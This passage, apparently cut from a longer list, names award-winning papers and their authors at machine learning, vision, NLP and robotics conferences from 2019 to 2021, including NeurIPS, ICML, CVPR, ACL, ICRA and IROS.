December 6-14, 2021) Outstanding Paper: A Universal Law of Robustness via Isoperimetry Sébastien Bubeck, Mark Sellke On the Expressivity of Markov Reward David Abel, Will Dabney, Anna Harutyunyan, Mark K. Ho, Michael Littman, Doina Precup, Satinder Singh Deep Reinforcement Learning at the Edge of the Statistical Precipice Rishabh Agarwal, Max Schwarzer, Pablo Samuel Castro, Aaron Courville, Marc G. Bellemare MAUVE: Measuring the Gap Between Neural Text and Human Text using Divergence Frontiers Krishna Pillutla, Swabha Swayamdipta, Rowan Zellers, John Thickstun, Sean Welleck, Yejin Choi, Zaid Harchaoui Continuized Accelerations of Deterministic and Stochastic Gradient Descents, and of Gossip Algorithms Mathieu Even, Raphaël Berthier, Francis Bach, Nicolas Flammarion, Pierre Gaillard, Hadrien Hendrikx, Laurent Massoulié, Adrien Taylor Moser Flow: Divergence-based Generative Modeling on Manifolds Noam Rozen, Aditya Grover, Maximilian Nickel, Yaron Lipman Test of Time: Online Learning for Latent Dirichlet Allocation Matthew Hoffman, David Blei, Francis Bach Datasets & Benchmarks Best Paper: Reduced, Reused and Recycled: The Life of a Dataset in Machine Learning Research Bernard Koch, Emily Denton, Alex Hanna, Jacob Gates Foster ATOM3D: Tasks on Molecules in Three Dimensions Raphael John Lamarre Townshend, Martin Vögele, Patricia Adriana Suriana, Alexander Derry, Alexander Powers, Yianni Laloudakis, Sidhika Balachandar, Bowen Jing, Brandon M. Anderson, Stephan Eismann, Risi Kondor, Russ Altman, Ron O. Dror # 3DV 2021 (Online. December 1-3, 2021) Best Paper: DPFM: Deep Partial Functional Maps Souhaib Attaiki, Gautam Pai, Maks Ovsjanikov Best Student Paper: RAFT-Stereo: Multilevel Recurrent Field Transforms for Stereo Matching Lahav Lipson, Zachary Teed, Jia Deng Best Paper Honorable Mention: Neural Disparity Refinement for Arbitrary Resolution Stereo Filippo Aleotti, Fabio Tosi, Pierluigi Zama Ramirez, Matteo Poggi, Samuele Salti, Stefano Mattoccia, Luigi Di Stefano Best Demo: TANDEM: Tracking and Dense Mapping in Real-time using Deep Multi-view Stereo Lukas Koestler, Nan Yang, Niclas Zeller, Daniel Cremers # CoRL 2021 (London, England. November 16-18, 2021) Best Paper: A System for General In-Hand Object Re-Orientation Tao Chen, Jie Xu, Pulkit Agrawal Best System Paper: FlingBot: The Unreasonable Effectiveness of Dynamic Manipulation for Cloth Unfolding Huy Ha, Shuran Song # EMNLP 2021 (Online. 
November 7-11, 2021) Best Long Paper: Visually Grounded Reasoning across Languages and Cultures Fangyu Liu, Emanuele Bugliarello, Edoardo Maria Ponti, Siva Reddy, Nigel Collier, Desmond Elliott Best Short Paper: CHoRaL: Collecting Humor Reaction Labels from Millions of Social Media Users Zixiaofan Yang, Shayan Hooshmand, Julia Hirschberg Outstanding Paper: MindCraft: Theory of Mind Modeling for Situated Dialogue in Collaborative Tasks Cristian-Paul Bara, Sky CH-Wang, Joyce Chai SituatedQA: Incorporating Extra-Linguistic Contexts into QA Michael Zhang, Eunsol Choi When Attention Meets Fast Recurrence: Training Language Models with Reduced Compute Tao Lei Shortcutted Commonsense: Data Spuriousness in Deep Learning of Commonsense Reasoning Ruben Branco, Antonio Branco, Joao Antonio Rodrigues, Joao Ricardo Silva Best Demonstration Paper: Datasets: A Community Library for Natural Language Processing Quentin Lhoest, Albert Villanova del Moral, Yacine Jernite, Abhishek Thakur, Patrick von Platen, Suraj Patil, Julien Chaumond, Mariama Drame, Julien Plu, Lewis Tunstall, Joe Davison, Mario Šaško, Gunjan Chhablani, Bhavitvya Malik, Simon Brandeis, Teven Le Scao, Victor Sanh, Canwen Xu, Nicolas Patry, Angelina McMillan-Major, Philipp Schmid, Sylvain Gugger, Clément Delangue, Théo Matussière, Lysandre Debut, Stas Bekman, Pierric Cistac, Thibault Goehringer, Victor Mustar, François Lagunas, Alexander Rush, Thomas Wolf # ICCV 2021 (Online. October 11 - October 17, 2021) Best Paper: Swin Transformer: Hierarchical Vision Transformer using Shifted Windows Ze Liu, Yutong Lin, Yue Cao, Han Hu, Yixuan Wei, Zheng Zhang, Stephen Lin, Baining Guo Best Student Paper: Pixel-Perfect Structure-from-Motion with Featuremetric Refinement Philipp Lindenberger, Paul-Edouard Sarlin, Viktor Larsson, Marc Pollefeys # IROS 2021 (Online. September 27 - October 1, 2021) Best Paper: Extended Tactile Perception: Vibration Sensing through Tools and Grasped Objects Tasbolat Taunyazov, Shui Song Luar, Eugene Lim, Hian Hian See, David Lee, Benjamin Tee, Harold Soh Best Student Paper: Dynamic Grasping with a “Soft” Drone: From Theory to Practice Joshua Fishman, Samuel Ubellacker, Nathan Hughes, Luca Carlone Best Application Paper: CCRobot-IV-F: A Ducted-Fan-Driven Flying-Type Bridge Stay Cable Climbing Robot Wenchao Zhang, Zhenliang Zheng, Xueqi Fu, Sarsenbek Hazken, Huaping Chen, Min Zhao, Ning Ding Best Cognitive Robotics Paper: Imagination-enabled Robot Perception Patrick Mania, Franklin Kenghagho Kenfack, Michael Neumann, and Michael Beetz Best Mobile Manipulation Paper: Probabilistic Inference in Planning for Partially Observable Long Horizon Problems Alphonsus Adu-Bredu, Nikhil Devraj, Pin-Han Lin, Zhen Zeng, Odest Chadwicke Jenkins Best Robot Mechanism and Design Paper: A Multi-Modal Robotic Gripper with a Reconfigurable Base: Improving Dexterous Manipulation without Compromising Grasping Efficiency Nathan Elangovan, Lucas Gerez, Geng Gao, Minas Liarokapis Best RoboCup Paper: Multi-Resolution POMDP Planning for Multi-Object Search in 3D Kaiyu Zheng, Yoonchang Sung, George Konidaris, Stefanie Tellex Best Entertainment and Amusement Paper: Collaborative Storytelling with Social Robots Eric Nichols, Leo Gao, Yurii Vasylkiv, Randy Gomez Best Safety, Security, and Rescue Robotics Paper: Alternating Drive-and-Glide Flight Navigation of a Kiteplane for Sound Source Position Estimation Makoto Kumon, Hiroshi G. 
Okuno, Shuichi Tajima Best Agri-Robotics Paper: A Robust Illumination-Invariant Camera System for Agricultural Applications Abhisesh Silwal, Tanvir Parhar, Francisco Yandun, Harjatin Baweja, George Kantor # CASE 2021 (Lyon, France. August 23-27, 2021) Best Paper: Extended Fabrication-Aware Convolution Learning Framework for Predicting 3D Shape Deformation in Additive Manufacturing Yuanxiang Wang, Cesar Ruiz, Qiang Huang Best Student Paper: Designing a User-Centred and Data-Driven Controller for Pushrim-Activated Power-Assisted Wheels: A Case Study Mahsa Khalili, H.F. Machiel Van der Loos, Jaimie Borisoff Best Application Paper: A Seamless Workflow for Design and Fabrication of Multimaterial Pneumatic Soft Actuators Lawrence Smith, Travis Hainsworth, Zachary Jordan, Xavier Bell, Robert MacCurdy Best Healthcare Automation Paper: Hospital Beds Planning and Admission Control Policies for COVID-19 Pandemic: A Hybrid Computer Simulation Approach Yiruo Lu, Yongpei Guan, Xiang Zhong, Jennifer Fishe, Thanh Hogan # ACL 2021 (Online. August 2-5, 2021) Best Paper: Vocabulary Learning via Optimal Transport for Neural Machine Translation Jingjing Xu, Hao Zhou, Chun Gan, Zaixiang Zheng, Lei Li Best Theme Paper: Including Signed Languages in Natural Language Processing Kayo Yin, Amit Moryossef, Julie Hochgesang, Yoav Goldberg, Malihe Alikhani Outstanding Paper: All That’s ‘Human’ Is Not Gold: Evaluating Human Evaluation of Generated Text Elizabeth Clark, Tal August, Sofia Serrano, Nikita Haduong, Suchin Gururangan, Noah A. Smith Intrinsic Dimensionality Explains the Effectiveness of Language Model Fine-Tuning Armen Aghajanyan, Sonal Gupta, Luke Zettlemoyer Mind Your Outliers! Investigating the Negative Impact of Outliers on Active Learning for Visual Question Answering Siddharth Karamcheti, Ranjay Krishna, Li Fei-Fei, Christopher Manning Neural Machine Translation with Monolingual Translation Memory Deng Cai, Yan Wang, Huayang Li, Wai Lam, Lemao Liu Scientific Credibility of Machine Translation Research: A Meta-Evaluation of 769 Papers Benjamin Marie, Atsushi Fujita, Raphael Rubino UnNatural Language Inference Koustuv Sinha, Prasanna Parthasarathi, Joelle Pineau, Adina Williams # Humanoids 2020 (Munich, Germany. July 19-21, 2021) Best Oral Paper: Development of Musculoskeletal Legs with Planar Interskeletal Structures to Realize Human Comparable Moving Function Moritaka Onitsuka, Manabu Nishiura, Kento Kawaharazuka, Kei Tsuzuki, Yasunori Toshimitsu, Yusuke Omura, Yuki Asano, Kei Okada, Koji Kawasaki, Masayuki Inaba Best Interactive Paper: Deep Episodic Memory for Verbalization of Robot Experience Leonard Bärmann, Fabian Peller-Konrad, Stefan Constantin, Tamim Asfour, Alex Waibel Mike Stilman Paper: Towards Complex and Continuous Manipulation: A Gesture Based Anthropomorphic Robotic Hand Design Li Tian, Hanhui Li, QiFa Wang, Xuezeng Du, Jialin Tao, Jordan Chong, Nadia Magnenat Thalmann, Jianmin Zheng Most Influential Paper: Capture Point: A Step toward Humanoid Push Recovery Jerry Pratt, John Carff, Sergey Drakunov, Ambarish Goswami # ICML 2021 (Online. 
July 18-24, 2021) Outstanding Paper: Unbiased Gradient Estimation in Unrolled Computation Graphs with Persistent Evolution Strategies Paul Vicol, Luke Metz, Jascha Sohl-Dickstein Outstanding Paper - Honorable Mention: Optimal Complexity in Decentralized Training Yucheng Lu, Christopher De Sa Oops I Took A Gradient: Scalable Sampling for Discrete Distributions Will Grathwohl, Kevin Swersky, Milad Hashemi, David Duvenaud, Chris Maddison Understanding self-supervised learning dynamics without contrastive pairs Yuandong Tian, Xinlei Chen, Surya Ganguli Solving high-dimensional parabolic PDEs using the tensor train format Lorenz Richter, Leon Sallandt, Nikolas Nüsken Test of Time: Bayesian Learning via Stochastic Gradient Langevin Dynamics Yee Teh, Max Welling # RSS 2021 (Online. July 12-16, 2021) Best Paper: TARE: A Hierarchical Framework for Efficiently Exploring Complex 3D Environments Chao Cao, Hongbiao Zhu, Howie Choset, Ji Zhang Best Student Paper: Learning Riemannian Manifolds for Geodesic Motion Skills Hadi Beik-mohammadi, Soren Hauberg, Georgios Arvanitidis, Gerhard Neumann, Leonel Rozo DiSECt: A Differentiable Simulation Engine for Autonomous Robotic Cutting Eric Heiden, Miles Macklin, Yashraj S. Narang, Dieter Fox, Animesh Garg, Fabio Ramos Best Systems Paper: TARE: A Hierarchical Framework for Efficiently Exploring Complex 3D Environments Chao Cao, Hongbiao Zhu, Howie Choset, Ji Zhang Test of Time: SARSOP: Efficient Point-Based POMDP Planning by Approximating Optimally Reachable Belief Spaces Hanna Kurniawati, David Hsu, Wee Sun Lee # CVPR 2021 (Online. June 19-25, 2021) Best Paper: GIRAFFE: Representing Scenes as Compositional Generative Neural Feature Fields Michael Niemeyer, Andreas Geiger Best Student Paper: Task Programming: Learning Data Efficient Behavior Representations Jennifer J. Sun, Ann Kennedy, Eric Zhan, David J. Anderson, Yisong Yue, Pietro Perona Retrospective Most Impactful Paper from CVPR 2011: Real-time human pose recognition in parts from single depth image Jamie Shotton, Andrew Fitzgibbon, Mat Cook, Toby Sharp, Mark Finocchio, Richard Moore, Alex Kipman, Andrew Blake Baby talk: Understanding and generating simple image descriptions Girish Kulkarni, Visruth Premraj, Sagnik Dhar, Siming Li, Yejin Choi, Alexander C. Berg, Tamara L. Berg # ICRA 2021 (Online. May 30 - June 5, 2021) Best Paper: Extrinsic Contact Sensing with Relative-Motion Tracking from Distributed Tactile Measurements Daolin Ma, Siyuan Dong, Alberto Rodriguez Best Student Paper: Unsupervised Learning of Lidar Features for Use in a Probabilistic Trajectory Estimator David Juny Yoon, Haowei Zhang, Mona Gridseth, Hugues Thomas, Timothy Barfoot Best Automation Paper: Automated Fabrication of the High-Fidelity Cellular Micro-Scaffold through Proportion-Corrective Control of the Photocuring Process Xin Li, Huaping Wang, Qing Shi, Jia Xin Liu, Zhanhua Xin, Xinyi Dong, Qiang Huang, Toshio Fukuda Best Cognitive Robotics Paper: How to Select and Use Tools? 
: Active Perception of Target Objects Using Multimodal Deep Learning Namiko Saito, Tetsuya Ogata, Satoshi Funabashi, Hiroki Mori, Shigeki Sugano Best Human-Robot Interaction Paper: Reactive Human-To-Robot Handovers of Arbitrary Objects Wei Yang, Chris Paxton, Arsalan Mousavian, Yu-Wei Chao, Maya Cakmak, Dieter Fox Best Mechanism and Design Paper: Soft Hybrid Aerial Vehicle Via Bistable Mechanism Xuan Li, Jessica McWilliams, Minchen Li, Cynthia Sung, Chenfanfu Jiang Best Medical Robotics Paper: Relational Graph Learning on Visual and Kinematics Embeddings for Accurate Gesture Recognition in Robotic Surgery Yonghao Long, Jie Ying Wu, Bo Lu, Yueming Jin, Mathias Unberath, Yunhui Liu, Pheng Ann Heng, Qi Dou Best Multi-Robot Systems Paper: Optimal Sequential Stochastic Deployment of Multiple Passenger Robots Chris (Yu Hsuan) Lee, Graeme Best, Geoffrey Hollinger Best Robot Manipulation Paper: StRETcH: A Soft to Resistive Elastic Tactile Hand Carolyn Matl, Josephine Koe, Ruzena Bajcsy Best Robot Vision Paper: Interval-Based Visual-LiDAR Sensor Fusion Raphael Voges, Bernardo Wagner Best Service Robotics Paper: Compact Flat Fabric Pneumatic Artificial Muscle (ffPAM) for Soft Wearable Robotic Devices Woojong Kim, Hyunkyu Park, Jung Kim Best Unmanned Aerial Vehicles Paper: Aerial Manipulator Pushing a Movable Structure Using a DOB-Based Robust Controller Dongjae Lee, Hoseong Seo, Inkyu Jang, Seung Jae Lee, H. Jin Kim # ICLR 2021 (Online. May 3-7, 2021) Outstanding Paper: Beyond Fully-Connected Layers with Quaternions: Parameterization of Hypercomplex Multiplications with 1/n Parameters Aston Zhang, Yi Tay, Shuai Zhang, Alvin Chan, Anh Tuan Luu, Siu Hui, Jie Fu Complex Query Answering with Neural Link Predictors Erik Arakelyan, Daniel Daza, Pasquale Minervini, Michael Cochez EigenGame: PCA as a Nash Equilibrium Ian Gemp, Brian McWilliams, Claire Vernade, Thore Graepel Learning Mesh-Based Simulation with Graph Networks Tobias Pfaff, Meire Fortunato, Alvaro Sanchez-Gonzalez, Peter Battaglia Neural Synthesis of Binaural Speech from Mono Audio Alexander Richard, Dejan Markovic, Israel D. Gebru, Steven Krenn, Gladstone Alexander Butler, Fernando Torre, Yaser Sheikh Optimal Rates for Averaged Stochastic Gradient Descent under Neural Tangent Kernel Regime Atsushi Nitanda, Taiji Suzuki Rethinking Architecture Selection in Differentiable NAS Ruochen Wang, Minhao Cheng, Xiangning Chen, Xiaocheng Tang, Cho-Jui Hsieh Score-Based Generative Modeling through Stochastic Differential Equations Yang Song, Jascha Sohl-Dickstein, Diederik P Kingma, Abhishek Kumar, Stefano Ermon, Ben Poole # AAAI 2021 (Online. 
February 2-9, 2021) Outstanding Paper: Informer: Beyond Efficient Transformer for Long Sequence Time-Series Forecasting Haoyi Zhou, Shanghang Zhang, Jieqi Peng, Shuai Zhang, Jianxin Li, Hui Xiong, Wancai Zhang Exploration-Exploitation in Multi-Agent Learning: Catastrophe Theory Meets Game Theory Stefanos Leonardos, Georgios Piliouras Outstanding Paper: Special Track on AI for Social Impact: Mitigating Political Bias in Language Models through Reinforced Calibration Ruibo Liu, Chenyan Jia, Jason W Wei, Guangxuan Xu, Lili Wang, Soroush Vosoughi Distinguished Paper: IQ – Incremental Learning for Solving QSAT Thomas L Lee, Viktor Tóth, Sean B Holden Ethically Compliant Sequential Decision Making Justin Svegliato, Samer Nashed, Shlomo Zilberstein On the Tractability of SHAP Explanations Guy Van den Broeck, Anton Lykov, Maximilian Schleich, Dan Suciu Expected Eligibility Traces Hado van Hasselt, Sephora Madjiheurem, Matteo Hessel, Andre Barreto, David Silver, Diana Borsa Polynomial-Time Algorithms for Counting and Sampling Markov Equivalent DAGs Marcel Wienöbst, Max Bannach, Maciej Liskiewicz Self-Supervised Multi-View Stereo via Effective Co-Segmentation and Data-Augmentation Hongbin Xu, Zhipeng Zhou, Yu Qiao, Wenxiong Kang, Qiuxia Wu Best 3-Minute Presentation: Are Chess Discussions Racist? An Adversarial Hate Speech Data Set Rupak Sarkar, Ashiqur R. Khudabukhs Best Demonstration: TAILOR: Teaching with Active and Incremental Learning for Object Registration Qianli Xu, Nicolas Gauthier, Wenyu Liang, Fen Fang, Hui Li Tan, Ying Sun, Yan Wu, Liyuan Li, Joo-Hwee Lim # NeurIPS 2020 (Online. December 6-12, 2020) Best Paper: No-Regret Learning Dynamics for Extensive-Form Correlated Equilibrium Andrea Celli, Alberto Marchesi, Gabriele Farina, Nicola Gatti Improved Guarantees and a Multiple-Descent Curve for Column Subset Selection and the Nyström Method Michal Derezinski, Rajiv Khanna, Michael W. Mahoney Language Models are Few-Shot Learners Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeffrey Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, Dario Amodei Test of Time: HOGWILD!: A Lock-Free Approach to Parallelizing Stochastic Gradient Descent Feng Niu, Benjamin Recht, Christopher Re, Stephen Wright # 3DV 2020 (Online. November 25-28, 2020) Best Paper: Grasping Field: Learning Implicit Representations for Human Grasps Korrawe Karunratanakul, Jinlong Yang, Yan Zhang, Michael Black, Krikamol Muandet, Siyu Tang # EMNLP 2020 (Online. November 16-20, 2020) Best Paper: Digital voicing of Silent Speech David Gaddy, Dan Klein Best Demonstration Paper: Transformers: State-of-the-art Natural Language Processing Thomas Wolf, Lysandre Debut, Victor Sanh, Julien Chaumond, Clement Delangue, Anthony Moi, Pierric Cistac, Tim Rault, Rémi Louf, Morgan Funtowicz, Joe Davison, Sam Shleifer, Patrick von Platen, Clara Ma, Yacine Jernite, Julien Plu, Canwen Xu, Teven Le Scao, Sylvain Gugger, Mariama Drame, Quentin Lhoest, Alexander M. Rush # CoRL 2020 (Online. 
November 16-18, 2020) Best Paper: Learning Latent Representations to Influence Multi-Agent Interaction Annie Xie, Dylan Losey, Ryan Tolsma, Chelsea Finn, Dorsa Sadigh Best System Paper: SMARTS: An Open-Source Scalable Multi-Agent RL Training School for Autonomous Driving Ming Zhou, Jun Luo, Julian Villella, Yaodong Yang, David Rusu, Jiayu Miao, Weinan Zhang, Montgomery Alban, Iman Fadakar, Zheng Chen, Chongxi Huang, Ying Wen, Kimia Hassanzadeh, Daniel Graves, Zhengbang Zhu, Yihan Ni, Nhat Nguyen, Mohamed Elsayed, Haitham Ammar, Alexander Cowen-Rivers, Sanjeevan Ahilan, Zheng Tian, Daniel Palenicek, Kasra Rezaee, Peyman Yadmellat, Kun Shao, Dong Chen, Baokuan Zhang, Hongbo Zhang, Jianye Hao, Wulong Liu, Jun Wang Best Presentation: Accelerating Reinforcement Learning with Learned Skill Priors Karl Pertsch, Youngwoon Lee, Joseph Lim # IROS 2020 (Online. October 25, 2020 - January 24, 2021) Best Paper: SwingBot: Learning Physical Features from In-Hand Tactile Exploration for Dynamic Swing-Up Manipulation Chen Wang, Shaoxiong Wang, Branden Romero, Filipe Fernandes Veiga, Edward Adelson Best Student Paper: Computational Design of Balanced Open Link Planar Mechanisms with Counterweights from User Sketches Takuto Takahashi, Hiroshi G. Okuno, Shigeki Sugano, Stelian Coros, Bernhard Thomaszewski Best Application Paper: MHYRO: Modular HYbrid RObot for Contact Inspection and Maintenance in Oil & Gas Plants Abraham López, Pedro J. Sanchez-Cuevas, Alejandro Suarez, Ámbar Soldado, Anibal Ollero Best Cognitive Robotics Paper: Representation and Experience-Based Learning of Explainable Models for Robot Action Execution Alex Mitrevski, Paul G. Plöger, Gerhard Lakemeyer Best Robot Mechanism and Design Paper: FreeBOT: A Freeform Modular Self-Reconfigurable Robot with Arbitrary Connection Point - Design and Implementation Guanqi Liang, Haobo Luo, Ming Li, Huihuan Qian, Tin Lun Lam Best RoboCup Paper: Real-Time Constrained Nonlinear Model Predictive Control on SO(3) for Dynamic Legged Locomotion Seungwoo Hong, Joon-Ha Kim, Hae-Won Park Best Entertainment and Amusement Paper: Towards Micro Robot Hydrobatics: Vision-based Guidance, Navigation, and Control for Agile Underwater Vehicles in Confined Environments Daniel Andre Duecker, Nathalie Bauschmann, Tim Hansen, Edwin Kreuzer, Robert Seifried Best Safety, Security, and Rescue Robotics Paper: Autonomous Spot: Long-Range Autonomous Exploration of Extreme Environments with Legged Locomotion Amanda Bouman, Muhammad Fadhil Ginting, Nikhilesh Alatur, Matteo Palieri, David D. Fan # ECCV 2020 (Online. August 23-28, 2020) Best Paper: RAFT: Recurrent All-Pairs Field Transforms for Optical Flow Zachary Teed, Jia Deng # CASE 2020 (Online. August 20-21, 2020) Best Paper: Long-Short Term Spatiotemporal Tensor Prediction for Passenger Flow Profile Ziyue Li, Hao Yan, Chen Zhang, Fugee Tsung Best Student Paper: Simulating Polyculture Farming to Tune Automation Policies for Plant Diversity and Precision Irrigation Yahav Avigal, Jensen Gao, William Wong, Kevin Li, Grady Pierroz, Fang Shuo Deng, Mark Theis, Mark Presten, Ken Goldberg Large-Workspace and High-Resolution Magnetic Microrobot Navigation Using Global-Local Path Planning and Eye-In-Hand Visual Servoing Lidong Yang, Li Zhang Best Application Paper: A System for Human-In-The-Loop Simulation of Industrial Collaborative Robot Applications Maximilian Metzner, Daniel Utsch, Walter Matthias, Christian Hofstetter, Christina Ramer, Andreas Blank, Jörg Franke # ICML 2020 (Online. 
July 13-18, 2020) Outstanding Paper: On Learning Sets of Symmetric Elements Haggai Maron, Or Litany, Gal Chechik, Ethan Fetaya Tuning-free Plug-and-Play Proximal Algorithm for Inverse Imaging Problems Kaixuan Wei, Angelica I Aviles-Rivero, Jingwei Liang, Ying Fu, Carola-Bibiane Schönlieb, Hua Huang Test of Time: Gaussian Process Optimization in the Bandit Setting: No Regret and Experimental Design Niranjan Srinivas, Andreas Krause, Sham Kakade, Matthias Seeger # RSS 2020 (Online. July 12-16, 2020) Best Paper: Learning Agile Robotic Locomotion Skills by Imitating Animals Xue Bin Peng, Erwin Coumans, Tingnan Zhang, Tsang-Wei Lee, Jie Tan, Sergey Levine Best Student Paper: A Continuous Representation of Belief over SO(3) for Robust Rotation Learning with Uncertainty Valentin Peretroukhin, Matthew Giamou, David M. Rosen, W. Nicholas Greene, Nicholas Roy, Jonathan Kelly Best Systems Paper: AlphaPilot: Autonomous Drone Racing Philipp Foehn, Dario Brescianini, Elia Kaufmann, Titus Cieslewski, Mathias Gehrig, Manasi Muglikar, Davide Scaramuzza Test of Time: Square Root SAM: Simultaneous localization and mapping via square root information smoothing Frank Dellaert, Michael Kaess # ACL 2020 (Online. July 5-10, 2020) Best Paper: Beyond Accuracy: Behavioral Testing of NLP Models with CheckList Marco Tulio Ribeiro, Tongshuang Wu, Carlos Guestrin, Sameer Singh Best Theme Paper: Climbing towards NLU: On Meaning, Form, and Understanding in the Age of Data Emily M. Bender, Alexander Koller Best Demonstration Paper: GAIA: A Fine-grained Multimedia Knowledge Extraction System Manling Li, Alireza Zareian, Ying Lin, Xiaoman Pan, Spencer Whitehead, Brian Chen, Bo Wu, Heng Ji, Shih-Fu Chang, Clare Voss, Daniel Napierski, Marjorie Freedman # CVPR 2020 (Online. June 16-18, 2020) Best Paper: Unsupervised Learning of Probably Symmetric Deformable 3D Objects from Images in the Wild Shangzhe Wu, Christian Rupprecht, Andrea Vedaldi Best Student Paper: BSP-Net: Generating Compact Meshes via Binary Space Partitioning Zhiqin Chen, Andrea Tagliasacchi, Hao Zhang # ICRA 2020 (Online. 
May 31 - August 31, 2020) Best Paper: Preference-Based Learning for Exoskeleton Gait Optimization Maegan Tucker, Ellen Novoseller, Claudia Kann, Yanan Sui, Yisong Yue, Joel Burdick, Aaron Ames Best Student Paper: Design of a Roller-Based Dexterous Hand for Object Grasping and Within-Hand Manipulation Shenli Yuan, Austin Epps, Jerome Nowak, Kenneth Salisbury Best Automation Paper: Securing Industrial Operators with Collaborative Robots: Simulation and Experimental Validation for a Carpentry Task Nassim Benhabib, Vincent Padois, David Daney Best Cognitive Robotics Paper: Semantic Linking Maps for Active Visual Object Search Zhen Zeng, Adrian Röfer, Odest Chadwicke Jenkins Best Human-Robot Interaction Paper: Preference-Based Learning for Exoskeleton Gait Optimization Maegan Tucker, Ellen Novoseller, Claudia Kann, Yanan Sui, Yisong Yue, Joel Burdick, Aaron Ames Best Medical Robotics Paper: Fault Tolerant Control in Shape-Changing Internal Robots Lavanya Balasubramanian, Tom Wray, Dana Damian Best Multi-Robot Systems Paper: Distributed Multi-Target Tracking for Autonomous Vehicle Fleets Ola Shorinwa, Javier Yu, Trevor Halsted, Alex Koufos, Mac Schwager Best Robot Manipulation Paper: Design of a Roller-Based Dexterous Hand for Object Grasping and Within-Hand Manipulation Shenli Yuan, Austin Epps, Jerome Nowak, Kenneth Salisbury Best Robot Vision Paper: Graduated Non-Convexity for Robust Spatial Perception: From Non-Minimal Solvers to Global Outlier Rejection Heng Yang, Pasquale Antonante, Vasileios Tzoumas, Luca Carlone Best Service Robotics Paper: Active Reward Learning for Co-Robotic Vision Based Exploration in Bandwidth Limited Environments Stewart Jamieson, Jonathan Patrick How, Yogesh Girdhar Best Unmanned Aerial Vehicles Paper: Design and Autonomous Stabilization of a Ballistically Launched Multirotor Amanda Bouman, Paul Nadan, Matthew Anderson, Daniel Pastor, Jacob Izraelevitz, Joel Burdick, Brett Kennedy # AAAI 2020 (New York, USA. February 7-12, 2020) Outstanding Paper: WinoGrande: An Adversarial Winograd Schema Challenge at Scale Keisuke Sakaguchi, Ronan Le Bras, Chandra Bhagavatula, Yejin Choi Outstanding Student Paper: Fair Division of Mixed Divisible and Indivisible Goods Xiaohui Bei, Zihao Li, Jinyan Liu, Shengxin Liu, Xinhang Lu Outstanding Paper: Special Track on AI for Social Impact: A Distributed Multi-Sensor Machine Learning Approach to Earthquake Early Warning Kevin Fauvel, Daniel Balouek-Thomert, Diego Melgar, Pedro Silva, Anthony Simonet, Gabriel Antoniu, Alexandru Costan, Véronique Masson, Manish Parashar, Ivan Rodero, Alexandre Termier # NeurIPS 2019 (Vancouver, Canada. December 8-14, 2019) Outstanding Paper: Distribution-Independent PAC Learning of Halfspaces with Massart Noise Ilias Diakonikolas, Themis Gouleakis, Christos Tzamos Outstanding New Directions Paper: Uniform convergence may be unable to explain generalization in deep learning Vaishnavh Nagarajan, J. Zico Kolter Test of Time: Dual Averaging Method for Regularized Stochastic Learning and Online Optimization Lin Xiao # IROS 2019 (Macau, China. November 4-8, 2019) Best Paper: Planning Reactive Manipulation in Dynamic Environments Philipp Sebastian Schmitt, Florian Wirnshofer, Kai M. Wurm, Georg v. 
Wichert, Wolfram Burgard Best Student Paper: Efficient and Guaranteed Planar Pose Graph Optimization Using the Complex Number Representation Taosha Fan, Hanlin Wang, Michael Rubenstein, Todd Murphey Best Application Paper: Visual Servoing of Miniature Magnetic Film Swimming Robots for 3D Arbitrary Path Following Chenyang Huang, Tiantian Xu, Jia Liu, Laliphat Manamanchaiyaporn, Xinyu Wu Best Cognitive Robotics Paper: Planning Beyond The Sensing Horizon Using a Learned Context Michael Everett, Justin Miller, Jonathan Patrick How Best RoboCup Paper: Motion Decoupling and Composition via Reduced Order Model Optimization for Dynamic Humanoid Walking with CLF-QP based Active Force Control Xiaobin Xiong, Aaron Ames Best Novel Technology Paper for Amusement Culture: Responsive Joint Attention in Human-Robot Interaction André Pereira, Catharine Oertel, Leonor Fermoselle, Joe Mendelson, Joakim Gustafson Best Safety, Security, and Rescue Robotics Paper: Optimization Based Motion Planning for Multi-Limbed Vertical Climbing Robots Xuan Lin, Jingwen Zhang, Junjie Shen, Gabriel Ikaika Fernandez, Dennis Hong # EMNLP 2019 (Hong Kong, China. November 3-7, 2019) Best Paper: Specializing Word Embeddings (for Parsing) by Information Bottleneck Xiang Lisa Li, Jason Eisner Best Resource Paper: Two New Evaluation Datasets for Low-Resource Machine Translation: Nepali-English and Sinhala English Francisco Guzmán, Peng-Jen Chen, Myle Ott, Juan Pino, Guillaume Lample, Philipp Koehn, Vishrav Chaudhary, Marc’Aurelio Ranzato Best Demo Paper: AllenNLP Interpret: A Framework for Explaining Predictions of NLP Models Eric Wallace, Jens Tuyls, Junlin Wang, Sanjay Subramanian, Matt Gardner, Sameer Singh # CoRL 2019 (Osaka, Japan. October 30 - November 1, 2019) Best Paper: A Divergence Minimization Perspective on Imitation Learning Methods Seyed Kamyar Seyed Ghasemipour, Richard Zemel, Shixiang Gu Best System Paper: Learning to Manipulate Object Collections Using Grounded State Representations Matthew Wilson, Tucker Hermans Best Presentation: Bayesian Optimization Meets Riemannian Manifolds in Robot Learning Noemie Jaquier, Leonel Rozo, Sylvain Calinon, Mathias Burger # ICCV 2019 (Seoul, Korea. October 27 - November 2, 2019) Best Paper: SinGAN: Learning a Generative Model from a Single Natural Image Tamar Rott Shaham, Tali Dekel, Tomer Michaeli Best Student Paper: PLMP - Point-Line Minimal Problems in Complete Multi-View Visibility Timothy Duff, Kathlén Kohn, Anton Leykin, Tomas Pajdla # Humanoids 2019 (Toronto, Canada. October 15-17, 2019) Best Oral Paper: Footstep Planning for Autonomous Walking Over Rough Terrain Robert J. Griffin, Georg Wiedebach, Stephen McCrory, Sylvain Bertrand, Inho Lee, Jerry Pratt Best Interactive Paper: Formal Connections between Template and Anchor Models via Approximate Simulation Vince Kurtz, Rafael Rodrigues da Silva, Patrick M. Wensing, Hai Lin Mike Stilman Paper: A Robot Design Method for Weight Saving Aimed at Dynamic Motions: Design of Humanoid JAXON3-P and Realization of Jump Motions Kunio Kojima, Yuta Kojio, Tatsuya Ishikawa, Fumihito Sugai, Yohei Kakiuchi, Kei Okada, Masayuki 